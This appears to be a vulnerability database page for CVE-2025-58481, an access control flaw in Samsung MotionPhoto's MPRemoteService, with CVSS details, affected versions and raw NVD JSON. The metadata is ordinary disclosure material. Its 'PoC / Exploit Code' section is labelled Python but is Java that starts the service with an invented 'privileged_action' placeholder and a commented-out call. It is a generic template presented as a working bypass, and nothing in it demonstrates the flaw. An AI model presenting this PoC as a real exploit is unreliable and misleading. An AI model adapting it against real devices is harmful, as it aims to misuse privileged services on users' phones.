Security Vulnerability Report
中文
CVE-2025-58481 CVSS 7.3 HIGH

CVE-2025-58481

Published: 2025-12-02 02:15:48
Last Modified: 2025-12-04 18:28:14

Description

Improper access control in MPRemoteService of MotionPhoto prior to version 4.1.51 allows local attackers to start privileged service.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:samsung:motionphoto:*:*:*:*:*:*:*:* - VULNERABLE
Samsung MotionPhoto < 4.1.51

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-58481 PoC - MPRemoteService Access Control Bypass // This PoC demonstrates how to start MPRemoteService without proper authorization import android.content.ComponentName; import android.content.Intent; import android.os.Bundle; public class MPRemoteServiceExploit { public static final String MPRemoteService_PKG = "com.sec.android.motionphoto"; public static final String MPRemoteService_CLASS = "com.samsung.android.motionphoto.MPRemoteService"; public static void exploit() { try { // Create intent to start MPRemoteService Intent intent = new Intent(); intent.setComponent(new ComponentName( MPRemoteService_PKG, MPRemoteService_CLASS )); // Add malicious payload or trigger privileged operations Bundle extras = new Bundle(); extras.putString("action", "privileged_action"); intent.putExtras(extras); // Start the service without proper authorization check // This should normally fail but bypasses access control // Note: Requires user interaction to trigger System.out.println("Attempting to start MPRemoteService..."); // Context.startService(intent); // Uncomment in Android environment } catch (Exception e) { e.printStackTrace(); } } } // Mitigation: Update MotionPhoto to version 4.1.51 or later

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58481", "sourceIdentifier": "[email protected]", "published": "2025-12-02T02:15:47.940", "lastModified": "2025-12-04T18:28:14.480", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper access control in MPRemoteService of MotionPhoto prior to version 4.1.51 allows local attackers to start privileged service."}, {"lang": "es", "value": "Control de acceso inadecuado en MPRemoteService de MotionPhoto en versiones anteriores a la versión 4.1.51 permite a atacantes locales iniciar un servicio privilegiado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samsung:motionphoto:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.1.51", "matchCriteriaId": "6AF5755E-8A5E-436A-8516-0EDEB6AE2504"}]}]}], "references": [{"url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=12", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}